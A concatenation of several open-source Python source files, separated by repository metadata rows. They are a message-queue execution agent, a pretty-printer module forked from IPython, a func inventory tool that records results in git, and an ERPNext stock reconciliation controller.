LOG.debug("Got an execution plan '{0}':".format(str(plan)))
self._run(plan)
return
msg_iterator.next()
def _run(self, plan):
with execution_plan_runner.ExecutionPlanRunner(plan) as runner:
try:
result = runner.run()
execution_result = ex_result.ExecutionResult.from_result(
result, plan)
self._queue.put_execution_result(execution_result, plan)
except Exception as ex:
LOG.exception('Error running execution plan')
execution_result = ex_result.ExecutionResult.from_error(ex,
plan)
self._queue.put_execution_result(execution_result, plan)
def _send_result(self, result):
with self._create_rmq_client() as mq:
msg = messaging.Message()
msg.body = result
msg.id = result.get('SourceID')
mq.send(message=msg,
key=CONF.rabbitmq.result_routing_key,
exchange=CONF.rabbitmq.result_exchange)
return True
def _create_rmq_client(self):
rabbitmq = CONF.rabbitmq
connection_params = {
'login': rabbitmq.login,
'password': rabbitmq.password,
'host': rabbitmq.host,
'port': rabbitmq.port,
'virtual_host': rabbitmq.virtual_host,
'ssl': rabbitmq.ssl,
'ca_certs': rabbitmq.ca_certs.strip() or None
}
return messaging.MqClient(**connection_params)
def _wait_plan(self):
delay = 5
while True:
try:
with self._create_rmq_client() as mq:
with mq.open(CONF.rabbitmq.input_queue,
prefetch_count=1) as subscription:
while True:
msg = subscription.get_message(timeout=5)
if msg is not None and isinstance(msg.body, dict):
self._handle_message(msg)
if msg is not None:
msg.ack()
yield
delay = 5
except KeyboardInterrupt:
break
except Exception:
LOG.warn('Communication error', exc_info=True)
time.sleep(delay)
delay = min(delay * 1.2, 60)
def _handle_message(self, msg):
print(msg.body)
if 'ID' not in msg.body and msg.id:
msg.body['ID'] = msg.id
err = self._verify_plan(msg.body)
if err is None:
self._queue.put_execution_plan(msg.body)
else:
try:
execution_result = ex_result.ExecutionResult.from_error(
err, bunch.Bunch(msg.body))
self._send_result(execution_result)
except ValueError:
LOG.warn('Execution result is not produced')
def _verify_plan(self, plan):
plan_format_version = plan.get('FormatVersion', '1.0.0')
if semver.compare(plan_format_version, '2.0.0') > 0 or \
semver.compare(plan_format_version, format_version) < 0:
range_str = 'in range 2.0.0-{0}'.format(plan_format_version) \
if format_version != '2.0.0' \
else 'equal to {0}'.format(format_version)
return exc.AgentException(
3,
'Unsupported format version {0} (must be {1})'.format(
plan_format_version, range_str))
for attr in ('Scripts', 'Files', 'Options'):
if attr in plan and not isinstance(
plan[attr], types.DictionaryType):
return exc.AgentException(
2, '{0} is not a dictionary'.format(attr))
for name, script in plan.get('Scripts', {}).items():
for attr in ('Type', 'EntryPoint'):
if attr not in script or not isinstance(
script[attr], types.StringTypes):
return exc.AgentException(
2, 'Incorrect {0} entry in script {1}'.format(
attr, name))
if not isinstance(script.get('Options', {}), types.DictionaryType):
return exc.AgentException(
2, 'Incorrect Options entry in script {0}'.format(name))
if script['EntryPoint'] not in plan.get('Files', {}):
return exc.AgentException(
2, 'Script {0} misses entry point {1}'.format(
name, script['EntryPoint']))
for additional_file in script.get('Files', []):
if additional_file not in plan.get('Files', {}):
return exc.AgentException(
2, 'Script {0} misses file {1}'.format(
name, additional_file))
for key, plan_file in plan.get('Files', {}).items():
for attr in ('BodyType', 'Body', 'Name'):
if attr not in plan_file:
return exc.AgentException(
2, 'Incorrect {0} entry in file {1}'.format(
attr, key))
if plan_file['BodyType'] not in ('Text', 'Base64'):
return exc.AgentException(
2, 'Incorrect BodyType in file {1}'.format(key))
return None
|
apache-2.0
| -4,816,543,227,355,885,000 | 36.735849 | 79 | 0.541375 | false | 4.35019 | false | false | false |
szlin/gitsome
|
xonsh/pretty.py
|
1
|
27713
|
# -*- coding: utf-8 -*-
"""
Python advanced pretty printer. This pretty printer is intended to
replace the old `pprint` python module which does not allow developers
to provide their own pretty print callbacks.
This module is based on ruby's `prettyprint.rb` library by `Tanaka Akira`.
The following implementations were forked from the IPython project:
* Copyright (c) 2008-2014, IPython Development Team
* Copyright (C) 2001-2007 Fernando Perez <[email protected]>
* Copyright (c) 2001, Janko Hauser <[email protected]>
* Copyright (c) 2001, Nathaniel Gray <[email protected]>
Example Usage
-------------
To directly print the representation of an object use `pprint`::
from pretty import pprint
pprint(complex_object)
To get a string of the output use `pretty`::
from pretty import pretty
string = pretty(complex_object)
Extending
---------
The pretty library allows developers to add pretty printing rules for their
own objects. This process is straightforward. All you have to do is to
add a `_repr_pretty_` method to your object and call the methods on the
pretty printer passed::
class MyObject(object):
def _repr_pretty_(self, p, cycle):
...
Here is an example implementation of a `_repr_pretty_` method for a list
subclass::
class MyList(list):
def _repr_pretty_(self, p, cycle):
if cycle:
p.text('MyList(...)')
else:
with p.group(8, 'MyList([', '])'):
for idx, item in enumerate(self):
if idx:
p.text(',')
p.breakable()
p.pretty(item)
The `cycle` parameter is `True` if pretty detected a cycle. You *have* to
react to that or the result is an infinite loop. `p.text()` just adds
non breaking text to the output, `p.breakable()` either adds a whitespace
or breaks here. If you pass it an argument it's used instead of the
default space. `p.pretty` prettyprints another object using the pretty print
method.
The first parameter to the `group` function specifies the extra indentation
of the next line. In this example the next item will either be on the same
line (if the items are short enough) or aligned with the right edge of the
opening bracket of `MyList`.
If you just want to indent something you can use the group function
without open / close parameters. Yu can also use this code::
with p.indent(2):
...
Inheritance diagram:
.. inheritance-diagram:: IPython.lib.pretty
:parts: 3
:copyright: 2007 by Armin Ronacher.
Portions (c) 2009 by Robert Kern.
:license: BSD License.
"""
from contextlib import contextmanager
import sys
import types
import re
import datetime
from collections import deque
# from IPython.utils.py3compat import PY3, cast_unicode
# from IPython.utils.encoding import get_stream_enc
from io import StringIO
__all__ = ['pretty', 'pprint', 'PrettyPrinter', 'RepresentationPrinter',
'for_type', 'for_type_by_name']
MAX_SEQ_LENGTH = 1000
_re_pattern_type = type(re.compile(''))
def _safe_getattr(obj, attr, default=None):
"""Safe version of getattr.
Same as getattr, but will return ``default`` on any Exception,
rather than raising.
"""
try:
return getattr(obj, attr, default)
except Exception:
return default
# if PY3:
CUnicodeIO = StringIO
# else:
# class CUnicodeIO(StringIO):
# """StringIO that casts str to unicode on Python 2"""
# def write(self, text):
# return super(CUnicodeIO, self).write(
# cast_unicode(text, encoding=get_stream_enc(sys.stdout)))
def pretty(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Pretty print the object's representation.
"""
stream = CUnicodeIO()
printer = RepresentationPrinter(stream, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
return stream.getvalue()
def pprint(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Like `pretty` but print to stdout.
"""
printer = RepresentationPrinter(sys.stdout, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
sys.stdout.write(newline)
sys.stdout.flush()
class _PrettyPrinterBase(object):
@contextmanager
def indent(self, indent):
"""with statement support for indenting/dedenting."""
self.indentation += indent
try:
yield
finally:
self.indentation -= indent
@contextmanager
def group(self, indent=0, gopen='', gclose=''):
"""like begin_group / end_group but for the with statement."""
self.begin_group(indent, gopen)
try:
yield
finally:
self.end_group(indent, gclose)
class PrettyPrinter(_PrettyPrinterBase):
"""
Baseclass for the `RepresentationPrinter` prettyprinter that is used to
generate pretty reprs of objects. Contrary to the `RepresentationPrinter`
this printer knows nothing about the default pprinters or the `_repr_pretty_`
callback method.
"""
def __init__(self, output, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
self.output = output
self.max_width = max_width
self.newline = newline
self.max_seq_length = max_seq_length
self.output_width = 0
self.buffer_width = 0
self.buffer = deque()
root_group = Group(0)
self.group_stack = [root_group]
self.group_queue = GroupQueue(root_group)
self.indentation = 0
def _break_outer_groups(self):
while self.max_width < self.output_width + self.buffer_width:
group = self.group_queue.deq()
if not group:
return
while group.breakables:
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
while self.buffer and isinstance(self.buffer[0], Text):
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
def text(self, obj):
"""Add literal text to the output."""
width = len(obj)
if self.buffer:
text = self.buffer[-1]
if not isinstance(text, Text):
text = Text()
self.buffer.append(text)
text.add(obj, width)
self.buffer_width += width
self._break_outer_groups()
else:
self.output.write(obj)
self.output_width += width
def breakable(self, sep=' '):
"""
Add a breakable separator to the output. This does not mean that it
will automatically break here. If no breaking on this position takes
place the `sep` is inserted which default to one space.
"""
width = len(sep)
group = self.group_stack[-1]
if group.want_break:
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
else:
self.buffer.append(Breakable(sep, width, self))
self.buffer_width += width
self._break_outer_groups()
def break_(self):
"""
Explicitly insert a newline into the output, maintaining correct indentation.
"""
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
def begin_group(self, indent=0, gopen=''):
"""
Begin a group. If you want support for python < 2.5 which doesn't has
the with statement this is the preferred way:
p.begin_group(1, '{')
...
p.end_group(1, '}')
The python 2.5 expression would be this:
with p.group(1, '{', '}'):
...
The first parameter specifies the indentation for the next line (usually
the width of the opening text), the second the opening text. All
parameters are optional.
"""
if gopen:
self.text(gopen)
group = Group(self.group_stack[-1].depth + 1)
self.group_stack.append(group)
self.group_queue.enq(group)
self.indentation += indent
def _enumerate(self, seq):
"""like enumerate, but with an upper limit on the number of items"""
for idx, x in enumerate(seq):
if self.max_seq_length and idx >= self.max_seq_length:
self.text(',')
self.breakable()
self.text('...')
raise StopIteration
yield idx, x
def end_group(self, dedent=0, gclose=''):
"""End a group. See `begin_group` for more details."""
self.indentation -= dedent
group = self.group_stack.pop()
if not group.breakables:
self.group_queue.remove(group)
if gclose:
self.text(gclose)
def flush(self):
"""Flush data that is left in the buffer."""
for data in self.buffer:
self.output_width += data.output(self.output, self.output_width)
self.buffer.clear()
self.buffer_width = 0
def _get_mro(obj_class):
""" Get a reasonable method resolution order of a class and its superclasses
for both old-style and new-style classes.
"""
if not hasattr(obj_class, '__mro__'):
# Old-style class. Mix in object to make a fake new-style class.
try:
obj_class = type(obj_class.__name__, (obj_class, object), {})
except TypeError:
# Old-style extension type that does not descend from object.
# FIXME: try to construct a more thorough MRO.
mro = [obj_class]
else:
mro = obj_class.__mro__[1:-1]
else:
mro = obj_class.__mro__
return mro
class RepresentationPrinter(PrettyPrinter):
"""
Special pretty printer that has a `pretty` method that calls the pretty
printer for a python object.
This class stores processing data on `self` so you must *never* use
this class in a threaded environment. Always lock it or reinstanciate
it.
Instances also have a verbose flag callbacks can access to control their
output. For example the default instance repr prints all attributes and
methods that are not prefixed by an underscore if the printer is in
verbose mode.
"""
def __init__(self, output, verbose=False, max_width=79, newline='\n',
singleton_pprinters=None, type_pprinters=None, deferred_pprinters=None,
max_seq_length=MAX_SEQ_LENGTH):
PrettyPrinter.__init__(self, output, max_width, newline, max_seq_length=max_seq_length)
self.verbose = verbose
self.stack = []
if singleton_pprinters is None:
singleton_pprinters = _singleton_pprinters.copy()
self.singleton_pprinters = singleton_pprinters
if type_pprinters is None:
type_pprinters = _type_pprinters.copy()
self.type_pprinters = type_pprinters
if deferred_pprinters is None:
deferred_pprinters = _deferred_type_pprinters.copy()
self.deferred_pprinters = deferred_pprinters
def pretty(self, obj):
"""Pretty print the given object."""
obj_id = id(obj)
cycle = obj_id in self.stack
self.stack.append(obj_id)
self.begin_group()
try:
obj_class = _safe_getattr(obj, '__class__', None) or type(obj)
# First try to find registered singleton printers for the type.
try:
printer = self.singleton_pprinters[obj_id]
except (TypeError, KeyError):
pass
else:
return printer(obj, self, cycle)
# Next walk the mro and check for either:
# 1) a registered printer
# 2) a _repr_pretty_ method
for cls in _get_mro(obj_class):
if cls in self.type_pprinters:
# printer registered in self.type_pprinters
return self.type_pprinters[cls](obj, self, cycle)
else:
# deferred printer
printer = self._in_deferred_types(cls)
if printer is not None:
return printer(obj, self, cycle)
else:
# Finally look for special method names.
# Some objects automatically create any requested
# attribute. Try to ignore most of them by checking for
# callability.
if '_repr_pretty_' in cls.__dict__:
meth = cls._repr_pretty_
if callable(meth):
return meth(obj, self, cycle)
return _default_pprint(obj, self, cycle)
finally:
self.end_group()
self.stack.pop()
def _in_deferred_types(self, cls):
"""
Check if the given class is specified in the deferred type registry.
Returns the printer from the registry if it exists, and None if the
class is not in the registry. Successful matches will be moved to the
regular type registry for future use.
"""
mod = _safe_getattr(cls, '__module__', None)
name = _safe_getattr(cls, '__name__', None)
key = (mod, name)
printer = None
if key in self.deferred_pprinters:
# Move the printer over to the regular registry.
printer = self.deferred_pprinters.pop(key)
self.type_pprinters[cls] = printer
return printer
class Printable(object):
def output(self, stream, output_width):
return output_width
class Text(Printable):
def __init__(self):
self.objs = []
self.width = 0
def output(self, stream, output_width):
for obj in self.objs:
stream.write(obj)
return output_width + self.width
def add(self, obj, width):
self.objs.append(obj)
self.width += width
class Breakable(Printable):
def __init__(self, seq, width, pretty):
self.obj = seq
self.width = width
self.pretty = pretty
self.indentation = pretty.indentation
self.group = pretty.group_stack[-1]
self.group.breakables.append(self)
def output(self, stream, output_width):
self.group.breakables.popleft()
if self.group.want_break:
stream.write(self.pretty.newline)
stream.write(' ' * self.indentation)
return self.indentation
if not self.group.breakables:
self.pretty.group_queue.remove(self.group)
stream.write(self.obj)
return output_width + self.width
class Group(Printable):
def __init__(self, depth):
self.depth = depth
self.breakables = deque()
self.want_break = False
class GroupQueue(object):
def __init__(self, *groups):
self.queue = []
for group in groups:
self.enq(group)
def enq(self, group):
depth = group.depth
while depth > len(self.queue) - 1:
self.queue.append([])
self.queue[depth].append(group)
def deq(self):
for stack in self.queue:
for idx, group in enumerate(reversed(stack)):
if group.breakables:
del stack[idx]
group.want_break = True
return group
for group in stack:
group.want_break = True
del stack[:]
def remove(self, group):
try:
self.queue[group.depth].remove(group)
except ValueError:
pass
try:
_baseclass_reprs = (object.__repr__, types.InstanceType.__repr__)
except AttributeError: # Python 3
_baseclass_reprs = (object.__repr__,)
def _default_pprint(obj, p, cycle):
"""
The default print function. Used if an object does not provide one and
it's none of the builtin objects.
"""
klass = _safe_getattr(obj, '__class__', None) or type(obj)
if _safe_getattr(klass, '__repr__', None) not in _baseclass_reprs:
# A user-provided repr. Find newlines and replace them with p.break_()
_repr_pprint(obj, p, cycle)
return
p.begin_group(1, '<')
p.pretty(klass)
p.text(' at 0x%x' % id(obj))
if cycle:
p.text(' ...')
elif p.verbose:
first = True
for key in dir(obj):
if not key.startswith('_'):
try:
value = getattr(obj, key)
except AttributeError:
continue
if isinstance(value, types.MethodType):
continue
if not first:
p.text(',')
p.breakable()
p.text(key)
p.text('=')
step = len(key) + 1
p.indentation += step
p.pretty(value)
p.indentation -= step
first = False
p.end_group(1, '>')
def _seq_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sequences. Used by
the default pprint for tuples, dicts, and lists.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
step = len(start)
p.begin_group(step, start)
for idx, x in p._enumerate(obj):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
if len(obj) == 1 and type(obj) is tuple:
# Special case for 1-item tuples.
p.text(',')
p.end_group(step, end)
return inner
def _set_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sets and frozensets.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
if len(obj) == 0:
# Special case.
p.text(basetype.__name__ + '()')
else:
step = len(start)
p.begin_group(step, start)
# Like dictionary keys, we will try to sort the items if there aren't too many
items = obj
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
items = sorted(obj)
except Exception:
# Sometimes the items don't sort.
pass
for idx, x in p._enumerate(items):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
p.end_group(step, end)
return inner
def _dict_pprinter_factory(start, end, basetype=None):
"""
Factory that returns a pprint function used by the default pprint of
dicts and dict proxies.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text('{...}')
p.begin_group(1, start)
keys = obj.keys()
# if dict isn't large enough to be truncated, sort keys before displaying
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
keys = sorted(keys)
except Exception:
# Sometimes the keys don't sort.
pass
for idx, key in p._enumerate(keys):
if idx:
p.text(',')
p.breakable()
p.pretty(key)
p.text(': ')
p.pretty(obj[key])
p.end_group(1, end)
return inner
def _super_pprint(obj, p, cycle):
"""The pprint for the super type."""
p.begin_group(8, '<super: ')
p.pretty(obj.__thisclass__)
p.text(',')
p.breakable()
p.pretty(obj.__self__)
p.end_group(8, '>')
def _re_pattern_pprint(obj, p, cycle):
"""The pprint function for regular expression patterns."""
p.text('re.compile(')
pattern = repr(obj.pattern)
if pattern[:1] in 'uU':
pattern = pattern[1:]
prefix = 'ur'
else:
prefix = 'r'
pattern = prefix + pattern.replace('\\\\', '\\')
p.text(pattern)
if obj.flags:
p.text(',')
p.breakable()
done_one = False
for flag in ('TEMPLATE', 'IGNORECASE', 'LOCALE', 'MULTILINE', 'DOTALL',
'UNICODE', 'VERBOSE', 'DEBUG'):
if obj.flags & getattr(re, flag):
if done_one:
p.text('|')
p.text('re.' + flag)
done_one = True
p.text(')')
def _type_pprint(obj, p, cycle):
"""The pprint for classes and types."""
# Heap allocated types might not have the module attribute,
# and others may set it to None.
# Checks for a __repr__ override in the metaclass
if type(obj).__repr__ is not type.__repr__:
_repr_pprint(obj, p, cycle)
return
mod = _safe_getattr(obj, '__module__', None)
name = _safe_getattr(obj, '__qualname__', obj.__name__)
if mod in (None, '__builtin__', 'builtins', 'exceptions'):
p.text(name)
else:
p.text(mod + '.' + name)
def _repr_pprint(obj, p, cycle):
"""A pprint that just redirects to the normal repr function."""
# Find newlines and replace them with p.break_()
output = repr(obj)
for idx, output_line in enumerate(output.splitlines()):
if idx:
p.break_()
p.text(output_line)
def _function_pprint(obj, p, cycle):
"""Base pprint for all functions and builtin functions."""
name = _safe_getattr(obj, '__qualname__', obj.__name__)
mod = obj.__module__
if mod and mod not in ('__builtin__', 'builtins', 'exceptions'):
name = mod + '.' + name
p.text('<function %s>' % name)
def _exception_pprint(obj, p, cycle):
"""Base pprint for all exceptions."""
name = getattr(obj.__class__, '__qualname__', obj.__class__.__name__)
if obj.__class__.__module__ not in ('exceptions', 'builtins'):
name = '%s.%s' % (obj.__class__.__module__, name)
step = len(name) + 1
p.begin_group(step, name + '(')
for idx, arg in enumerate(getattr(obj, 'args', ())):
if idx:
p.text(',')
p.breakable()
p.pretty(arg)
p.end_group(step, ')')
#: the exception base
try:
_exception_base = BaseException
except NameError:
_exception_base = Exception
#: printers for builtin types
_type_pprinters = {
int: _repr_pprint,
float: _repr_pprint,
str: _repr_pprint,
tuple: _seq_pprinter_factory('(', ')', tuple),
list: _seq_pprinter_factory('[', ']', list),
dict: _dict_pprinter_factory('{', '}', dict),
set: _set_pprinter_factory('{', '}', set),
frozenset: _set_pprinter_factory('frozenset({', '})', frozenset),
super: _super_pprint,
_re_pattern_type: _re_pattern_pprint,
type: _type_pprint,
types.FunctionType: _function_pprint,
types.BuiltinFunctionType: _function_pprint,
types.MethodType: _repr_pprint,
datetime.datetime: _repr_pprint,
datetime.timedelta: _repr_pprint,
_exception_base: _exception_pprint
}
try:
_type_pprinters[types.DictProxyType] = _dict_pprinter_factory('<dictproxy {', '}>')
_type_pprinters[types.ClassType] = _type_pprint
_type_pprinters[types.SliceType] = _repr_pprint
except AttributeError: # Python 3
_type_pprinters[slice] = _repr_pprint
try:
_type_pprinters[xrange] = _repr_pprint
_type_pprinters[long] = _repr_pprint
_type_pprinters[unicode] = _repr_pprint
except NameError:
_type_pprinters[range] = _repr_pprint
_type_pprinters[bytes] = _repr_pprint
#: printers for types specified by name
_deferred_type_pprinters = {
}
def for_type(typ, func):
"""
Add a pretty printer for a given type.
"""
oldfunc = _type_pprinters.get(typ, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_type_pprinters[typ] = func
return oldfunc
def for_type_by_name(type_module, type_name, func):
"""
Add a pretty printer for a type specified by the module and name of a type
rather than the type object itself.
"""
key = (type_module, type_name)
oldfunc = _deferred_type_pprinters.get(key, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_deferred_type_pprinters[key] = func
return oldfunc
#: printers for the default singletons
_singleton_pprinters = dict.fromkeys(map(id, [None, True, False, Ellipsis,
NotImplemented]), _repr_pprint)
def _defaultdict_pprint(obj, p, cycle):
name = 'defaultdict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(obj.default_factory)
p.text(',')
p.breakable()
p.pretty(dict(obj))
def _ordereddict_pprint(obj, p, cycle):
name = 'OrderedDict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(list(obj.items()))
def _deque_pprint(obj, p, cycle):
name = 'deque'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(list(obj))
def _counter_pprint(obj, p, cycle):
name = 'Counter'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(dict(obj))
for_type_by_name('collections', 'defaultdict', _defaultdict_pprint)
for_type_by_name('collections', 'OrderedDict', _ordereddict_pprint)
for_type_by_name('collections', 'deque', _deque_pprint)
for_type_by_name('collections', 'Counter', _counter_pprint)
if __name__ == '__main__':
from random import randrange
class Foo(object):
def __init__(self):
self.foo = 1
self.bar = re.compile(r'\s+')
self.blub = dict.fromkeys(range(30), randrange(1, 40))
self.hehe = 23424.234234
self.list = ["blub", "blah", self]
def get_foo(self):
print("foo")
pprint(Foo(), verbose=True)
|
gpl-3.0
| 1,760,497,032,878,910,500 | 31.337223 | 95 | 0.567062 | false | 3.978894 | false | false | false |
pombredanne/func
|
func/overlord/inventory.py
|
1
|
6796
|
##
## func inventory app.
## use func to collect inventory data on anything, yes, anything
##
## Copyright 2007, Red Hat, Inc
## Michael DeHaan <[email protected]>
## +AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
import os.path
import time
import optparse
import sys
import pprint
import xmlrpclib
from func.minion import sub_process
import func.overlord.client as func_client
import func.utils as utils
DEFAULT_TREE = "/var/lib/func/inventory/"
class FuncInventory(object):
def __init__(self):
pass
def run(self,args):
p = optparse.OptionParser()
p.add_option("-v", "--verbose",
dest="verbose",
action="store_true",
help="provide extra output")
p.add_option("-s", "--server-spec",
dest="server_spec",
default="*",
help="run against specific servers, default: '*'")
p.add_option("-m", "--methods",
dest="methods",
default="inventory",
help="run inventory only on certain function names, default: 'inventory'")
p.add_option("-M", "--modules",
dest="modules",
default="all",
help="run inventory only on certain module names, default: 'all'")
p.add_option("-t", "--tree",
dest="tree",
default=DEFAULT_TREE,
help="output results tree here, default: %s" % DEFAULT_TREE)
p.add_option("-n", "--no-git",
dest="nogit",
action="store_true",
help="disable useful change tracking features")
p.add_option("-x", "--xmlrpc", dest="xmlrpc",
help="output data using XMLRPC format",
action="store_true")
p.add_option("-j", "--json", dest="json",
help="output data using JSON",
action="store_true")
(options, args) = p.parse_args(args)
self.options = options
filtered_module_list = options.modules.split(",")
filtered_function_list = options.methods.split(",")
self.git_setup(options)
# see what modules each host provides (as well as what hosts we have)
host_methods = func_client.Overlord(options.server_spec).system.list_methods()
# call all remote info methods and handle them
if options.verbose:
print "- scanning ..."
# for (host, modules) in host_modules.iteritems():
for (host, methods) in host_methods.iteritems():
if utils.is_error(methods):
print "-- connection refused: %s" % host
break
for each_method in methods:
#if type(each_method) == int:
# if self.options.verbose:
# print "-- connection refused: %s" % host
# break
tokens = each_method.split(".")
module_name = ".".join(tokens[:-1])
method_name = tokens[-1]
if not "all" in filtered_module_list and not module_name in filtered_module_list:
continue
if not "all" in filtered_function_list and not method_name in filtered_function_list:
continue
overlord = func_client.Overlord(host,noglobs=True) # ,noglobs=True)
results = getattr(getattr(overlord,module_name),method_name)()
if self.options.verbose:
print "-- %s: running: %s %s" % (host, module_name, method_name)
self.save_results(options, host, module_name, method_name, results)
self.git_update(options)
return 1
def format_return(self, data):
"""
The call module supports multiple output return types, the default is pprint.
"""
# special case... if the return is a string, just print it straight
if type(data) == str:
return data
if self.options.xmlrpc:
return xmlrpclib.dumps((data,""))
if self.options.json:
try:
import simplejson
return simplejson.dumps(data)
except ImportError:
print "ERROR: json support not found, install python-simplejson"
sys.exit(1)
return pprint.pformat(data)
# FUTURE: skvidal points out that guest symlinking would be an interesting feature
def save_results(self, options, host_name, module_name, method_name, results):
dirname = os.path.join(options.tree, host_name, module_name)
if not os.path.exists(dirname):
os.makedirs(dirname)
filename = os.path.join(dirname, method_name)
results_file = open(filename,"w+")
data = self.format_return(results)
results_file.write(data)
results_file.close()
def git_setup(self,options):
if options.nogit:
return
if not os.path.exists("/usr/bin/git"):
print "git-core is not installed, so no change tracking is available."
print "use --no-git or, better, just install it."
sys.exit(411)
if not os.path.exists(options.tree):
os.makedirs(options.tree)
dirname = os.path.join(options.tree, ".git")
if not os.path.exists(dirname):
if options.verbose:
print "- initializing git repo: %s" % options.tree
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "init"], shell=False)
# FIXME: check rc's
os.chdir(cwd)
else:
if options.verbose:
print "- git already initialized: %s" % options.tree
def git_update(self,options):
if options.nogit:
return
else:
if options.verbose:
print "- updating git"
mytime = time.asctime()
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "add", "*" ], shell=False)
rc2 = sub_process.call(["/usr/bin/git", "commit", "-a", "-m", "Func-inventory update: %s" % mytime], shell=False)
# FIXME: check rc's
os.chdir(cwd)
if __name__ == "__main__":
inv = FuncInventory()
inv.run(sys.argv)
|
gpl-2.0
| 2,945,001,256,754,425,000 | 34.581152 | 121 | 0.543996 | false | 4.282294 | false | false | false |
gangadharkadam/office_erp
|
erpnext/stock/doctype/stock_reconciliation/stock_reconciliation.py
|
1
|
11155
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
import json
from frappe import msgprint, _
from frappe.utils import cstr, flt, cint
from erpnext.stock.stock_ledger import update_entries_after
from erpnext.controllers.stock_controller import StockController
class StockReconciliation(StockController):
def __init__(self, arg1, arg2=None):
super(StockReconciliation, self).__init__(arg1, arg2)
self.head_row = ["Item Code", "Warehouse", "Quantity", "Valuation Rate"]
def validate(self):
self.entries = []
self.validate_data()
self.validate_expense_account()
def on_submit(self):
self.insert_stock_ledger_entries()
self.make_gl_entries()
def on_cancel(self):
self.delete_and_repost_sle()
self.make_cancel_gl_entries()
def validate_data(self):
if not self.reconciliation_json:
return
data = json.loads(self.reconciliation_json)
# strip out extra columns (if any)
data = [row[:4] for row in data]
if self.head_row not in data:
msgprint(_("""Wrong Template: Unable to find head row."""),
raise_exception=1)
# remove the help part and save the json
head_row_no = 0
if data.index(self.head_row) != 0:
head_row_no = data.index(self.head_row)
data = data[head_row_no:]
self.reconciliation_json = json.dumps(data)
def _get_msg(row_num, msg):
return _("Row # {0}: ").format(row_num+head_row_no+2) + msg
self.validation_messages = []
item_warehouse_combinations = []
# validate no of rows
rows = data[1:]
if len(rows) > 100:
msgprint(_("""Sorry! We can only allow upto 100 rows for Stock Reconciliation."""),
raise_exception=True)
for row_num, row in enumerate(rows):
# find duplicates
if [row[0], row[1]] in item_warehouse_combinations:
self.validation_messages.append(_get_msg(row_num, _("Duplicate entry")))
else:
item_warehouse_combinations.append([row[0], row[1]])
self.validate_item(row[0], row_num+head_row_no+2)
# validate warehouse
if not frappe.db.get_value("Warehouse", row[1]):
self.validation_messages.append(_get_msg(row_num, _("Warehouse not found in the system")))
# if both not specified
if row[2] == "" and row[3] == "":
self.validation_messages.append(_get_msg(row_num,
_("Please specify either Quantity or Valuation Rate or both")))
# do not allow negative quantity
if flt(row[2]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Quantity is not allowed")))
# do not allow negative valuation
if flt(row[3]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Valuation Rate is not allowed")))
# throw all validation messages
if self.validation_messages:
for msg in self.validation_messages:
msgprint(msg)
raise frappe.ValidationError
def validate_item(self, item_code, row_num):
from erpnext.stock.doctype.item.item import validate_end_of_life, \
validate_is_stock_item, validate_cancelled_item
# using try except to catch all validation msgs and display together
try:
item = frappe.get_doc("Item", item_code)
if not item:
raise frappe.ValidationError, (_("Item: {0} not found in the system").format(item_code))
# end of life and stock item
validate_end_of_life(item_code, item.end_of_life, verbose=0)
validate_is_stock_item(item_code, item.is_stock_item, verbose=0)
# item should not be serialized
if item.has_serial_no == "Yes":
raise frappe.ValidationError, _("Serialized Item {0} cannot be updated \
using Stock Reconciliation").format(item_code)
# item managed batch-wise not allowed
if item.has_batch_no == "Yes":
raise frappe.ValidationError, _("Item: {0} managed batch-wise, can not be reconciled using \
Stock Reconciliation, instead use Stock Entry").format(item_code)
# docstatus should be < 2
validate_cancelled_item(item_code, item.docstatus, verbose=0)
except Exception, e:
self.validation_messages.append(_("Row # ") + ("%d: " % (row_num)) + cstr(e))
